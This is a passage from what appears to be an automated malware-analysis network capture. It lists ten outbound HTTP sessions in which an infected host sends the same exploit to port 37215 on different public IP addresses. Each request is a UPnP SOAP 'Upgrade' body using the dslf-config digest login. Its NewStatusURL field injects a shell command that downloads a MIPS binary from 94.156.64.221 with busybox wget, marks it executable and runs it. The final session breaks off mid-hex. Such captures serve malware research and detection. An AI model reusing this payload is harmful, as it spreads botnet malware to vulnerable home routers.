                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    301192.168.2.235122441.200.45.18237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.256553888 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    302192.168.2.2341396197.204.51.15537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.256596088 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    303192.168.2.233779441.88.60.13837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.256630898 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    304192.168.2.2352956156.95.106.6737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.256689072 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    305192.168.2.235261641.56.241.4037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.256721973 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    306192.168.2.2354536197.248.232.7637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.256773949 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    307192.168.2.2357300156.13.117.5737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.256856918 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    308192.168.2.2358434197.24.244.11737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.256903887 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    309192.168.2.233714841.238.177.5037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.256952047 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    310192.168.2.2358146156.249.12.2337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.257008076 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 